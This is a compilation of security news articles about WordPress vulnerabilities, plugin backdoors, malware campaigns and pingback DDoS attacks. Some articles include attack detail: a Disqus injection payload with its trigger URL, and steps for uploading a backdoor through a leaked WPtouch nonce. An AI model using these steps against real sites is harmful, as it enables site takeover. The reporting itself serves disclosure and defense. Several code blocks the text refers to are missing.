The Hacker News — Cyber Security, Hacking, Technology News

Buying popular plugins with a large user-base and using it for effortless malicious campaigns have become a new trend for bad actors.

One such incident happened recently when the renowned developer BestWebSoft sold a popular Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download and install a hidden backdoor.

In a blog post published on Tuesday, WordFence security firm revealed why WordPress recently kicked a popular Captcha plugin with more than 300,000 active installations out of its official plugin store.

While reviewing the source code of the Captcha plugin, WordFence folks found a severe backdoor that could allow the plugin author or attackers to remotely gain administrative access to WordPress websites without requiring any authentication.

The plugin was configured to automatically pull an updated "backdoored" version from a remote URL — https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php — after installation from the official Wordpress repository without site admin consent.

This backdoor code was designed to create a login session for the attacker, who is the plugin author in this case, with administrative privileges, allowing them to gain access to any of the 300,000 websites (using this plugin) remotely without requiring any authentication.

Also, the modified code pulled from the remote server is almost identical to the code in legitimate plugin repository, therefore "triggering the same automatic update process removes all file system traces of the backdoor," making it look as if it was never there and helping the attacker avoid detection.

The reason behind the adding a backdoor is unclear at this moment, but if someone pays a handsome amount to buy a popular plugin with a large user base, there must be a strong motive behind.

In similar cases, we have seen how organized cyber gangs acquire popular plugins and applications to stealthy infect their large user base with malware, adware, and spyware.

While figuring out the actual identity of the Captcha plugin buyer, WordFence researchers found that the simplywordpress[dot]net domain serving the backdoor file was registered to someone named "Stacy Wellington" using the email address "scwellington[at]hotmail.co.uk."

Using reverse whois lookup, the researchers found a large number of other domains registered to the same user, including Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.

What's interesting? All of the above-mentioned domains booked under the user contained the same backdoor code that the WordFence researchers found in Captcha.

WordFence has teamed up with WordPress to patch the affected version of Captcha plug-in and blocked the author from publishing updates, so websites administrators are highly recommended to replace their plugin with the latest official Captcha version 4.4.5.

WordFence has promised to release in-depth technical details on how the backdoor installation and execution works, along with a proof-of-concept exploit after 30 days so that admins get enough time to patch their websites.

A SQL Injection vulnerability has been discovered in one of the most popular Wordpress plugins, installed on over 300,000 websites, which could be exploited by hackers to steal databases and possibly hijack the affected sites remotely.

The flaw has been discovered in the highly popular WP Statistics plugin, which allows site administrators to get detailed information related to the number of users online on their sites, the number of visits and visitors, and page statistics.

Discovered by Sucuri team, WordPress plugin WP Statistics is vulnerable to SQL Injection flaw that allows a remote attacker, with at least a subscriber account, to steal sensitive information from the website's database and possibly gain unauthorized access to websites.

SQL Injection is a web application bug that allows hackers to inject malicious Structured Query Language (SQL) code to web inputs in order to determine the structure and location of key databases, which eventually allows stealing of the database.

"This vulnerability is caused by the lack of sanitization in user-provided data," researchers said. "Some attributes of the shortcode wpstatistics are being passed as parameters for important functions and this should not be a problem if those parameters were sanitized."

"One of the vulnerable functions wp_statistics_searchengine_query() in the file 'includes/functions/functions.php' is accessible through WordPress' AJAX functionality thanks to the core function wp_ajax_parse_media_shortcode()."

This function does not check for additional privileges, which allows website subscribers to execute this shortcode and inject malicious code to its attributes.

The researchers at Sucuri privately disclosed the flaw to the WP Statistics team and the team had patched the vulnerability in its latest version WP Statistics version 12.0.8.

So, if you have a vulnerable version of the plugin installed and your website allowing user registration, you are definitely at risk, and you should install the latest version as soon as possible.

Last week, we reported about a critical zero-day flaw in WordPress that was silently patched by the company before hackers have had their hands on the nasty bug to exploit millions of WordPress websites.

To ensure the security of millions of websites and its users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install the patch, ensuring that the issue was dealt with in short order before it became public.

But even after the company's effort to protect its customers, thousands of admins did not bother to update their websites, which are still vulnerable to the critical bug and has already been exploited by hackers.

While WordPress includes a default feature that automatically updates unpatched websites, some admins running critical services disable this feature for first testing and then applying patches.

Even the news blog of one of the famous Linux distribution OpenSUSE (news.opensuse.org) was also hacked, but restored immediately without breach of any other part of openSUSE's infrastructure, CIO reports.

The vulnerability resided in Wordpress REST API that would lead to the creation of new flaws, allowing an unauthenticated attacker to delete pages or modify all pages on unpatched websites and redirect their visitors to malicious exploits and a large number of attacks.

The security researcher at Sucuri, who privately disclosed the flaw to WordPress, said they started noticing the attacks leveraging this bug less than 48 hours after disclosure. They noticed at least four different campaigns targeting still unpatched websites.

In one such campaign, hackers were successful in replacing the content of over 66,000 web pages with "Hacked by" messages. Rest campaigns have targeted roughly 1000 pages in total.

Besides defacing websites, such attacks appear to be carried out mostly for black hat SEO campaign in order to spread spam and gain ranking in search engine, which is also known as search engine poisoning.

"What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward," explained Daniel Cid, CTO, and founder of Sucuri.

"There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability."

So, site administrators who have not yet updated their websites to the latest WordPress release 4.7.2 are urged to patch them immediately before becoming next target of SEO spammers and hackers.

Last week, WordPress patched three security flaws, but just yesterday the company disclosed about a nasty then-secret zero-day vulnerability that let remote unauthorized hackers modify the content of any post or page within a WordPress site.

The nasty bug resides in Wordpress REST API that would lead to the creation of two new vulnerabilities: Remote privilege escalation and Content injection bugs.

Wordpress is the world's most popular content management system (CMS) used on millions of websites. The CMS recently added and enabled REST API by default on WordPress 4.7.0.

Flaw lets Unauthorised Hacker Redirect Visitors to Malicious Exploits

The vulnerability is easy to exploit and affects versions 4.7 and 4.7.1 of the Wordpress content management system (CMS), allowing an unauthenticated attacker to modify all pages on unpatched sites and redirect visitors to malicious exploits and a large number of attacks.

The vulnerability was discovered and reported by Marc-Alexandre Montpas from Sucuri to the WordPress security team who handled the matter very well by releasing a patch, but not disclosing details about the flaw in an effort to keep hackers away from exploiting the bug before millions of websites implement the patch.

"This privilege escalation vulnerability affects the WordPress REST API," Montpas writes in a blog post. "One of these REST endpoints allows access (via the API) to view, edit, delete and create posts. Within this particular endpoint, a subtle bug allows visitors to edit any post on the site."

Why WordPress Delayed the Vulnerability Disclosure

The issue was discovered on January 22nd, patched on January 26th and the fix was made available in release 4.7.2 to websites using the popular CMS.

Sucuri security providers and hosts worked closely with Wordpress security team for over a week to install the patch, ensuring that the issue was dealt with in short order before it became public.

The company also tipped off security companies including SiteLock, Cloudflare, and Incapsula over 9 days between disclosure and patch.

"We believe transparency is in the public's best interest...[and]... in this case, we intentionally delayed disclosing the issue by one week to ensure the safety of millions of additional WordPress sites."

"Data from all four WAFs and WordPress hosts showed no indication that the vulnerability had been exploited in the wild. As a result, we made the decision to delay disclosure of this particular issue to give time for automatic updates to run and ensure as many users as possible were protected before the issue was made public."

Patch your CMS Now!

The flaw has been rated critical, although the fix has automatically been deployed on millions of WordPress installations in the few hours after the patch was issued.

For a more technical explanation about the vulnerability, you can head on the Sucuri's official blog post.

WordPress admins who have not yet implemented the patch against the nasty vulnerability are strongly advised to update their CMS to Wordpress version 4.7.2.

Good news, we bring an amazing deal of this month for our readers, where you can get hacking courses for as little as you want to pay and if you beat the average price you will receive the fully upgraded hacking bundle!

Do you own a custom domain or a blog under the wordpress.com domain name?

If yes, then there is good news for you.

WordPress is bringing free HTTPS to every blog and website that belongs to them in an effort to make the Web more secure.

WordPress – free, open source and the most popular a content management system (CMS) system on the Web – is being used by over a quarter of all websites across the world, and this new move represents a massive shift over to a more secure Internet

WordPress announced on Friday that it has partnered with the Electronic Frontier Foundation's "Let's Encrypt" project, allowing it to provide reliable and free HTTPS support for all of its customers that use custom domains for their WordPress.com blogs.

Now every website hosted on wordpress.com has an SSL certificate and will display a green lock in the address bar.

"For you, the users, that means you'll see secure encryption automatically deployed on every new site within minutes. We are closing the door to unencrypted web traffic (HTTP) at every opportunity," Wordpress said in its blog post.

HTTPS has already been available for all sub-domains registered on wordpress.com, but with the latest update, the company will soon offer free SSL certs for its custom domains that just use the WordPress backend.

In short, users with custom domains (https://abcdomain.com) will now receive a free SSL certificate issued by Let's Encrypt and on behalf of Wordpress, and have it automatically deployed on their servers with minimal effort.

Until now, switching web server from HTTP to HTTPS is something of a hassle and expense for website operators and notoriously hard to install and maintain it.

However, with the launch of Let's Encrypt, it is now easier for anyone to obtain Free SSL/TLS (Secure Socket Layer/Transport Layer Security) certificates for his/her web servers and set up HTTPS websites in a few simple steps.

Now WordPress is also taking advantage of this free, open source initiative for its websites.

So you might have a question in your mind:

What do I need to do to activate HTTPS on my WordPress blog?

You do not need to worry about this at all. WordPress.com is activating HTTPS on all of its millions websites without having you to do anything.

Let's Encrypt is trusted and recognized by all major browsers, including Google's Chrome, Mozilla's Firefox and Microsoft's Internet Explorer, so you need not worry about its authenticity.

WordPress has just released the new version of its content management system (CMS), WordPress version 4.2.3, to fix a critical security vulnerability that could have been exploited by hackers to take over websites, affecting the security of its Millions of sites.

WordPress version 4.2.3 resolves a Cross-Site Scripting (XSS) flaw that could allow any user with the Contributor or Author role to compromise a website, Gary Pendergast of the WordPress team wrote in a blog post on Thursday.

Cross-site scripting is actually a vulnerability in the Web applications' code that opens up the target website to attacks. The vulnerability is one of the most favorite and commonly used flaws by cyber criminals.

According to the company, the vulnerability could allow hackers to embed maliciously-crafted HTML, JavaScript, Flash, or other code to bypass WordPress's kses protection by fooling users into executing a malicious script on their computer system.

This, in turn, leads to the collection of users' sensitive data, including cookies stored on their systems.

It is still unknown exactly how websites could be compromised using the flaw, as more details about the vulnerability aren't yet made available by the company.

Update your WordPress CMS Now!

All versions of WordPress from 4.2.2 and earlier are affected by the flaw, but you need not worry about it if you have Automatic Security Updates enabled.

However, if not, you are strongly recommended to update your WordPress CMS to version 4.2.3 as soon as possible.

To Update WordPress, all you need to do is just go to the main WordPress "Dashboard", then "Updates"and click "Update Now." And you are done.

A critical vulnerability has been discovered in one of the most popular plugins of the the WordPress content management platform that puts more than one Million websites at risks of being completely hijacked by the attackers.

The vulnerability actually resides in most versions of a WordPress plugin called Wettable Powder Slimstat (WP-Slimstat). While there are more than 70 million websites on the Internet currently running WordPress, more than 1.3 Million of them use the ‘WP-Slimstat’ Plugin, making it one of the popular plugins of WordPress for powerful real-time web analytic.

All the WP-Slimstat versions prior to the latest release of Slimstat 3.9.6 contain an easily guessable 'secret' key which is used to sign data sent to and from the visiting end-user computers, explained in a blog post published Tuesday by Web security firm Sucuri.

Once the weak 'secret' key is break, an attacker could perform an SQL injection attack against the target website in order to grab highly sensitive information from victim’s database, including encrypted passwords and the encryption keys used to remotely administer websites.

"If your website uses a vulnerable version of the plugin, you’re at risk," Marc-Alexandre Montpas, a senior vulnerability researcher at Sucuri, wrote.

"Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including username, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover)."

The WP-Slimstat 'secret' key is just an MD5 hash version of the plugin’s installation timestamp. With the use of sites like Internet Archive, a hacker could easily identify the year a target vulnerable website was put on the Internet.

This would left an attacker with about 30 Million values to test, that could be completed in about 10 minutes with most modern CPUs. Once the secret key has been detected, the attacker can use the key to tug sensitive data out of the database.

Users who run their websites on the WordPress content management system and have this popular WP-Slimstat plugin installed are being cautioned to upgrade their websites immediately in order to protect your website from this dangerous vulnerability.

After the disclosure of extremely critical GHOST vulnerability in the GNU C library (glibc) — a widely used component of most Linux distributions, security researchers have discovered that PHP applications, including the WordPressContent Management System (CMS), could also be affected by the bug.

"GHOST" is a serious vulnerability (CVE-2015-0235), announced this week by the researchers of California-based security firm Qualys, that involves a heap-based buffer overflow in the glibc function name - "GetHOSTbyname()." Researchers said the vulnerability has been present in the glibc code since 2000.

Though the major Linux distributors such as Red Hat, Debian and Ubuntu, have already updated their software against the flaw, GHOST could be used by hackers against only a handful of applications currently to remotely run executable code and silently gain control of a Linux server.

As we explained in our previous article, heap-based buffer overflow was found in __nss_hostname_digits_dots() function, which is particularly used by the gethostbyname() and gethostbyname2() glibc function call.

Since, PHP applications including WordPress also use the gethostbyname() function wrapper, the chance of the critical vulnerability becomes higher even after many Linux distributions issued fixes.

GHOST - BIG ISSUE FOR WORDPRESS

According to the Sucuri researcher Marc-Alexandre Montpas, GHOST vulnerability could be a big issue for WordPress CMS, as it uses wp_http_validate_url() function to validate every pingback post URL.

"....And it does so by using gethostbyname()," wrote Montpas in an advisory published Wednesday. "So an attacker could leverage this vector to insert a malicious URL that would trigger a buffer overflow bug, server-side, potentially allowing him to gain privileges on the server."

The vulnerability affects all versions of glibc from glibc-2.17 and lower. However, it was patched in glibc-2.18 in May 2013, but was not marked as a security vulnerability so the fix did not make it into many common Linux distributions like RedHat and Ubuntu.

HOW TO CHECK YOUR SYSTEM AGAINST GHOST FLAW

"This is a very critical vulnerability and should be treated as such," Montpas said. "If you have a dedicated server (or VPS) running Linux, you have to make sure you update it right away."

Sucuri also provided the following test PHP code, which an admin can run on their server terminal. If the code returns a segmentation fault, then your Linux server is vulnerable to the GHOST vulnerability.

Until now, Debian 7, Red Hat Enterprise Linux 6 and 7, CentOS 6 and 7 and Ubuntu 12.04 have released software updates. So users of above Linux distributions are recommended to patch their systems, followed by a system reboot, as soon as possible.

Disable XML-RPC

If you don’t want to use XML-RPC process, it is possible to disable it altogether. There are even Wordpress plugins that will totally disable XML-RPC process.

Disable Pingback Requests

You may also disable the pingback feature by adding the following code to your functions.php file:

The popular copy and paste website 'Pastebin' created a decade ago for software developers and even by hackers groups to share source code, dumps and stolen data, has more recently been leveraged by cyber criminals to target millions of users.

Compromising a website and then hosting malware on it has become an old tactic for hackers, and now they are trying their hands in compromising vast majority of users in a single stroke. Researchers have discovered that hackers are now using Pastebin to spread malicious backdoor code.

According to a blog post published yesterday by a senior malware researcher at Sucuri, Denis Sinegubko, the hackers are leveraging the weakness in older versions of the RevSlider, a popular and a premium WordPress plugin. The plugin comes packaged and bundled into the websites’ themes in such a way that many website owners don't even know they have it.

In order to exploit the vulnerability, first hackers look for a RevSlider plugin in the target website and once discovered, they use a second vulnerability in Revslider and attempt to upload a malicious backdoor to the website.

"Technically, the criminals used Pastebin for what it was built for – to share code snippets," Sinegubko wrote in a blog post. "The only catch is that the code is malicious, and it is used in illegal activity (hacking) directly off of the Pastebin website."

Security researchers came across a segment of code that injects the content of a Base64-encoded $temp variable into a WordPress core wp-links-opml.php file. Researchers noticed some code is being downloaded from the legitimate Pastebin.com website and is dependent on using a parameter, wp_nonce_once, that disguises the fact that it calls upon an actual Pastebin file.

The wp_nonce_once parameter, which is commonly used to protect against unexpected or duplicate requests, also makes the malicious code difficult to block, and at the same time "adds flexibility to the backdoor," the researcher claims.

This means that the malicious backdoor can be tricked to download and execute any code snippet hosted on Pastebin — even those that don't exist at the time of injection — you just need to pass a request through that wp-links-opml.php file.

So far, it’s unclear exactly how widespread this malicious backdoor is, but the impact could be much dangerous when it comes to Pastebin which has 1.5 million active user accounts as of last year.

Founded in 2002, Pastebin was initially developed as an open online forum where computer developers could share programming code. But the site’s gradual appeal to hackers of all ranks made it increasingly difficult to monitor the site for bad behavior. Many hacker groups share data stolen from famous companies via the service and some pastes are also known to be used in malware attacks, which may contain encrypted addresses and even base64-encoded malicious binary code.

Last month security researchers at Sucuri discovered a new type of malware threat, dubbed SoakSoak, that was modifying files in WordPress websites that used an older version of “Slider Revolution,” aka RevSlider, a slideshow plugin. At the time, the search engine giant Google blacklisted over 11,000 websites it spotted spreading the malware.

THN Deals Store this week brings you the Cybersecurity Certification Mega Bundle, which will walk you through the skills and concepts you need to master three elite cybersecurity certification exams: CISA, CISM, and CISSP [...]

The users of WordPress, a free and open source blogging tool as well as content management system (CMS), are being informed of a widespread malware attack campaign that has already compromised more than 100,000 websites worldwide and still counting.

The news broke throughout the WordPress community earlier Sunday morning when Google blacklisted over 11,000 domains due to the latest malware campaign, that has been brought by SoakSoak.ru, thus being dubbed the ‘SoakSoak Malware’ epidemic.

While there are more than 70 million websites on the Internet currently running WordPress, so this malware campaign could be a great threat to those running their websites on WordPress.

Once infected, you may experience irregular website behavior including unexpected redirects to SoakSoak.ru web pages. You may also end up downloading malicious files onto your computer systems automatically without any knowledge.

The search engine giant has already been on top of this infection and has added over 11,000 websites to their blacklist that could have seriously affected the revenue potential of website owners, running those blacklisted websites.

The security team at the security firm Sucuri, which is actively investigating the potential vector of the malware, said that the infections are not targeted only at WordPress websites, but it appears that the impact seems to be affecting most hosts across the WordPress hosting spectrum.

SoakSoak malware modifies the file located at wp-includes/template-loader.php which causes wp-includes/js/swobject.js to be loaded on every page view on the website and this “swobject.js” file includes a malicious java encoded script malware.

If you run any website and are worried about the potential risk of the infection to your website, Sucuri has provided a Free SiteCheck scanner that will check your website for the malware. The exact method of intrusion has not been pointed out at this time, but numerous signals led to believe us all that many WordPress users could have fallen victim to this attack.

However, if you are behind the Website Firewall, CloudProxy, you are being protected from the SoakSoak malware campaign.

If you own a mobile version for your Wordpress website using the popular WPtouch plugin, then you may expose to a critical vulnerability that could potentially allow any non-administrative logged-in user to upload malicious PHP files or backdoors to the target server without any admin privileges.

WordPress is a free and an open source blogging tool as well as a content management system (CMS) with 30,000 plugins, each of which offers custom functions and features enabling users to tailor their sites to their specific needs.

That is why, it is easy to setup and used by more than 73 million of websites across the world, and about 5.7 million them uses WPtouch plugin, making it one of the most popular plugins in the WordPress plugin directory.

WPtouch is a mobile plugin that automatically enables a user friendly and elegant mobile theme for rendering your WordPress website contents on the mobile devices. User can easily customize many aspects of its appearance by the administration panel and deliver a fast, user-friendly and stylish version of their site to its mobile visitors, without modifying or affecting the desktop version of the theme.

PHP SHELL UPLOAD VULNERABILITY

Security researchers at Sucuri have warned the WordPress users to update the popular WPTouch plugin after they uncovered a security vulnerability that could allow any logged-in user, without administrative privileges, to take over the website by uploading a backdoor inside your website’s directories.

The vulnerability was discovered during a routine audit for the company’s web application firewall (WAF). Researchers said that only those websites that allow registration of guest users, which is by-default enabled for the comments section of the site, are at great risk.

The vulnerable version of the plugin uses the “admin_init” hook in WordPress as an authentication method, which could lead user to gain unrestricted access to the website by uploading a malicious PHP files to the server.

It is quite simple to compromise the web location. The “admin_initialize()” method is called by the “admin_init” hook in the file “core/classwptouchpro.php.” The admin nonce (number used once) is then generated and included on the WordPress script queue.

“This nonce was also used to verify whether or not a user could upload files to the server. As the script didn’t use any other form of identification to check or authenticate the user’s privilege to upload files, it was possible for any user to complete the upload in there,” says the blog post.

STEPS TO HACK A WORDPRESS WEBSITE

All an attacker had to do in order to compromise a vulnerable website was to:

Log­in and get his nonce via wp-admin

Send an AJAX file upload request containing the leaked nonce and his backdoor

“So long story short – don’t only use nonces to protect sensitive methods, always add functions such as “current_user_can()” or the likes to confirm a user’s right to do something.”

The current security vulnerability only affects websites running the plugin versions 3.x. So, the users and website administrators who relies on the previous version have nothing to worry about, but they should update regardless.

The issue with WPTouch is not the only security vulnerability researchers at Sucuri have discovered. At the beginning of June, Sucuri found two serious vulnerabilities in the popular WordPress SEO plugin called “All in One SEO Pack”

The security team also discovered a critical Remote Code Execution (RCE) flaw in ‘Disqus Comment System’ Plugin of Wordpress few weeks before.

A Remote code execution (RCE) vulnerability has been discovered in the comment and discussion service, Disqus plugin for the most popular Blogging Platform Wordpress.

While there are more than 70 million websites on the Internet currently running WordPress, about 1.3 million of them use the ‘Disqus Comment System’ Plugin, making it one of the popular plugins of Wordpress for web comments and discussions.

The security team at the security firm Sucuridiscovered a critical Remote Code Execution (RCE) flaw while analyzing some custom JSON parser of the Disqus plugin and found that the variable parsing function could allow anyone to execute commands on the server using insecurely coded PHP eval() function.

WHO ARE VULNERABLE

The Remote Code Execution (RCE) Vulnerability could be triggered by a remote attacker, only if it is using following application versions on the server/website.

PHP version 5.1.6 or earlier

WordPress 3.1.4 or earlier

Wordpress Plugin Disqus Comment System 2.75 or earlier

HOW TO EXPLOIT DISQUS

For successful exploitation an attacker can push its custom payload, for example {${phpinfo()}} as a comment on the targeted post/page and then he only need to open the following ‘Comment Synchronization’ url with the targeted post ID in order to take advantage of the vulnerability.

http://somesite.com/?cf_action=sync_comments&post_id=TARGET_POST_ID

“While the flaw itself is very dangerous” reads the blog post. “That's it, looks simple right? So if you are using an outdated version of WordPress/PHP, you need to update Disqus asap.”

At the beginning of the month, the same security researchers’ team at Sucuri, discovered a critical vulnerability in the content management platform, All in One SEO Pack, a plugin that optimizes WordPress for search engines, which potentially left millions of websites vulnerable to the attackers.

HOW TO PATCH VULNERABILITY

If left unpatched, the flaw could allow any potential attacker to do anything he wants with a vulnerable website. So, it is highly recommended to those using an outdated versions of WordPress, Disqus Comment Plugin 2.76and PHP to upgrade to the latest version as soon as possible.

WordPress users should be able to update their Disqus plugin by signing into their WordPress administrative panel > Disqus Comment System plugin > drop-down at the top or bottom of the page > click “Update.” Users can also manually update the plugin by overwriting the plugin files directly into the WordPress’ plugin directory.

Yesterday we learned of a critical Zero-day vulnerability in a popular image resizing library called TimThumb, which is used in thousands WordPress themes and plugins.

WordPress is a free and open source blogging tool and a content management system (CMS) with more than 30,000 plugins, each of which offers custom functions and features enabling users to tailor their sites to their specific needs, therefore it is easy to setup and use, that’s why tens of millions of websites across the world opt it.

But if you or your company are the one using the popular image resizing library called “TimThumb” to resize large images into usable thumbnails that you can display on your site, then you make sure to update the file with the upcoming latest version and remember to check the TimThumb site regularly for the patched update.

0-Day REMOTE CODE EXECUTION & NO PATCH

The critical vulnerability discovered by Pichaya Morimoto in the TimThumb Wordpress plugin version 2.8.13, resides in its “Webshot” feature that, when enabled, allows attackers to execute commands on a remote website.

The vulnerability allows an attacker to remotely execute arbitrary PHP code on the affected website. Once the PHP code has been executed, the website can be easily compromised in the way the attacker wants. Until now, there is no patch available for the flaw.

“With a simple command, an attacker can create, remove and modify any files on your server,” says Security experts at Sucuri break in a blog post.

Using the following command, a hacker can create, delete and modify any files on your server:

Multiple Serious vulnerabilities have been discovered in the most famous ‘All In One SEO Pack’ plugin for WordPress, that put millions of Wordpress websites at risk.

WordPress is easy to setup and use, that’s why large number of people like it. But if you or your company is using ‘All in One SEO Pack’ Wordpress plugin to optimize the website ranking in search engines, then you should update your SEO plugin immediately to the latest version of All in One SEO Pack 2.1.6.

Today, All in One SEO Pack plugin team has released an emergency security update that patches two critical privilege escalation vulnerabilities and one cross site scripting (XSS) flaw, discovered by security researchers at Sucuri, a web monitoring and malware clean up service.

More than 73 million websites on the Internet run their websites on the WordPress publishing platform and more than 15 million websites are currently using All in One SEO Pack plugin for search engine optimization.

According to Sucuri, the reported privilege escalation vulnerabilities allow an attacker to add and modify the WordPress website’s meta information, that could harm its search engine ranking negatively.

"In the first case, a logged-in user, without possessing any kind of administrative privileges (like an author of subscriber), could add or modify certain parameters used by the plugin. It includes the post’s SEO title, description and keyword meta tags." Sucuri said.

Also the reported cross-site scripting vulnerability can be exploited by malicious hackers to execute malicious JavaScript code on an administrator’s control panel. "This means that an attacker could potentially inject any JavaScript code and do things like changing the admin’s account password to leaving some backdoor in your website’s files in order to conduct even more “evil” activities later." Sucuri blog post said.

Vulnerability in WordPress plugins is the root cause for the majority of WordPress exploitation and this is one of the main tools in the web hackers' arsenal. The plugin vulnerabilities could be exploited to access sensitive information, deface websites, redirect visitors to any malicious site, or to perform DDoS attacks.

Till now, we haven't seen any web attacks conducted by exploiting these vulnerabilities in the wild, but WordPress website owners are recommended to update their All in One SEO Pack Wordpress plugin to the latest version immediately.

DDoS attacks are a growing issue facing by governments and businesses. In a recent attack, thousands of legitimate WordPress websites have been hijacked by hackers, without the need for them to be compromised. Instead, the attackers took advantage of an existing WordPress vulnerability (CVE-2013-0235) - “Pingback Denial of Service possibility”.

The attack exploited an issue with the XML-RPC (XML remote procedure call) of the WordPress, use to provide services such as Pingbacks, trackbacks, which allows anyone to initiate a request from WordPress to an arbitrary site.

The functionality should be used to generate cross references between blogs, but it can easily be used for a single machine to originate millions of requests from multiple locations.

"Any WordPress site with XML-RPC enabled (which is on by default) can be used in DDoS attacks against other sites,” Sucuri researcher said in the blog post.

The Pingback mechanism has been known to be a security risk for some time. XML-RPC is enabled by default on WordPress and websites with no protection mechanism are vulnerable to this attack.

To stop your WordPress website from being misused, you will need to disable the XML-RPC (Pingback) functionality on your site, but completely disabling XML-RPC itself is unlikely because it’s needed for important features. Wordpress administrators can check online WordPress DDOS Scanner tool to find if their blogs are vulnerable or not and if it is, then a better way to block it is by adding the following code to your theme:

In a recent cyber attack on a Forum site, thousands of outdated legitimate WordPress blogs were abused to perform DDOS attacks using previously known vulnerabilities.

After analyzing the Log file from the victim's server, we have noticed many Wordpress CMS based educational (.EDU) and Government (.GOV) websites from where the attack was originated.

In the past we have reported about many such cyber attacks, where attackers hacked into the Wordpress blogs using password brute-force attack or they used the PINGBACK vulnerability in older versions of Wordpress without compromising the server.

WordPress has a built in functionality called Pingback, which allows anyone to initiate a request from WordPress to an arbitrary site and it can be used for a single machine to originate millions of requests from multiple locations.

We have seen more than 100,000 IP addresses involved in the recent DDOS attack and the victim's Forum website received more than 40,000 requests in 7 minutes from different Wordpress blogs and IP addresses.

In this recent attack, we have noticed more than 4000 .EDU and .GOV sites along with thousands of other abused sites, including following:

open.nasa.gov

oversight.house.gov

digitalbusiness.gov.au

pilr.blogs.law.pace.edu

itp.nyu.edu/~mlt324/MattTsBlog

cctevents.creighton.edu

tech.journalism.cuny.edu

languagelog.ldc.upenn.edu/nll

researchcenter.journalism.cuny.edu

testkitchen.colorado.edu

smartpyme.blogs.uoc.edu

journalism.cuny.edu

blogs.ei.columbia.edu

cctevents.creighton.edu

admissions.vanderbilt.edu/vandybloggers

erb.umich.edu

metalab.harvard.edu

greenlaw.blogs.law.pace.edu

and thousands more..

These large servers can cause much more damage in DDoS attacks because the servers have the large network bandwidth and are capable of generating significant amounts of traffic.

At this time it's not clear that either these Wordpress blogs are compromised or the Pingback vulnerability was used to perform the attack.

But It’s always wise to learn from other’s mistake. If you still use 'admin' or common name as a user name on your blog, change it, use a strong password. There are also security plug-ins available, two-factor authentication options available for WordPress and of course make sure you are up-to-date on the latest version of WordPress.

There is currently a Mega cyber attack campaign being launched on a large number of WordPress websites across the Internet.

In April, 2012 we reported about a large distributed brute force attack against millions of WordPress sites were occurring, out of that hackers are successful to compromise 90,000 servers to create a large Botnet of Wordpress hosts.

According to the DDOS attack logs report received from a 'The Hacker News' reader 'Steven Veldkamp', victim's website was under under heavy DDOS attack recently, coming from various compromised Wordpress based websites.

Possibly using the brute force attack on WordPress administrative portals with the a world list of the most commonly used username and password combinations, attackers are taking control of many poorly secured WordPress Hosts.

After analyzing the piece of a DDOS attack Log file from timing 23/Sep/2013:13:03:13 +0200 to 23/Sep/2013:13:02:47 +0200, we found that in 26 second attacker was able to perform DDOS attack from 569 unique compromised Wordpress blogs. Hacked websites include blogs of Mercury Science and Policy at MIT, National Endowment for the Arts (arts.gov), The Pennsylvania State University and Stevens Institute of Technology.
So an attacker using a large number of high performance hosting in order to build a much larger botnet of for a DDOS attack. This attack is happening at a global level and WordPress instances across hosting providers are being targeted. Since the attack is highly distributed in nature (most of the IP’s used are spoofed), it is very difficult to block all malicious data.

According to the statistics recently published by WP WhiteSecurity, more than 70% of WordPress installations are vulnerable to hackers out of the World's Top 1 Million websites having a Wordpress installed.

From the table above you can determine that at least 30,823 WordPress websites out of 42,106 are vulnerable to exploitable vulnerabilities, which can be detected using free automated vulnerability assessment tools.

Also in August, 2012 Researchers at Arbor Networks have uncovered a botnet called Fort Disco that was used to compromise more than 6000 websites based on popular CMSs such as WordPress, Joomla and Datalife Engine.

If you are running WordPress sites, now would be a good time to ensure that strong passwords are always used and that your username should be changed from “admin”.

Password theft has been a growing problem within the security community. Researchers at Arbor Networks have uncovered a botnet called Fort Disco that was used to compromise more than 6000 websites based on popular CMSs such as WordPress, Joomla and Datalife Engine.

The Fort Disco botnet is currently made up of nearly 25,000 Windows machines and receives a list of sites to attack from a central command and control server. The bots receive also a list of common username-password combinations, typically composed of default combinations with password options including admin or 123456.

Arbor Networks security researcher Matthew Bing said the attack has several advanced features that make it next to impossible to fully track and they obtained precious info on the botnet exploiting a misconfiguration on the attackers’ side that made possible the analysis of logs on several of the six command and control servers discovered.

“We stumbled upon these detailed logs the attacker left open on some of the command and control servers,” “We were able to piece together enough of the picture.” Bing said.

The Fort Disco botnet was responsible for a series of brute-force attacks against thousand of websites, security experts found on compromised websites a variant of the FilesMan PHP backdoor used by the botmaster to remotely control victims PC.

The backdoor allows file management on victims and also the download and execution of malicious payload and of course it is used to send commands to bots. A PHP shell uploaded to compromised sites enable in fact botmaster to use commands to tens of thousands of bots quickly.

Fort Disco is similar to Brobot attacksbeing used in the ongoing attacks against financial services firms. Arbor does not have evidence that the Fort Disco attacks are related to the QCF/Brobot incidents or phishing campaigns that have been used against the banks.

"Beginning with the Brobot attacks in early 2013, we’ve seen attackers focusing on targeting blogs and content management systems," "This marks a tactical change in exploiting weak passwords and out-of-date software on popular platforms." Bing states.

Another particular emerged from investigation is that a small number of websites presented also a PHP-based redirector used to hijack victims to websites hosting the Styx exploit kit.

The top three countries in terms of infections are the Philippines, Peru, and Mexico. Bing added that the authors are likely Russian given that the C&Cs were found on Russian and Ukrainian IP addresses, the default characters are in Cyrillic, and some error strings within the malware were written in Russian.

A Drupal data breach was announced by the official Drupal Association, that Passwords for almost one million accounts on the Drupal.org website are being reset after hackers gained unauthorized access to sensitive user data.

The security of the open source content management system has been compromised via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal itself. As countermeasure it is resetting the passwords for nearly one million accounts in the wake of a data breach.

Information exposed includes usernames, email addresses, and country information, as well as hashed passwords. The Drupal.org hasn't revealed the name of the third-party application exploited during the attack.

Evidence of the Drupal data breach was found during a routine security audit:

“Upon discovering the files during a security audit, we shut down the association.drupal.org website to mitigate any possible ongoing security issues related to the files,” “The Drupal security team then began forensic evaluations and discovered that user account information had been accessed via this vulnerability.”

“The Drupal.org Security Team and Infrastructure Team have discovered unauthorized access to account information on Drupal.org and groups.drupal.org.
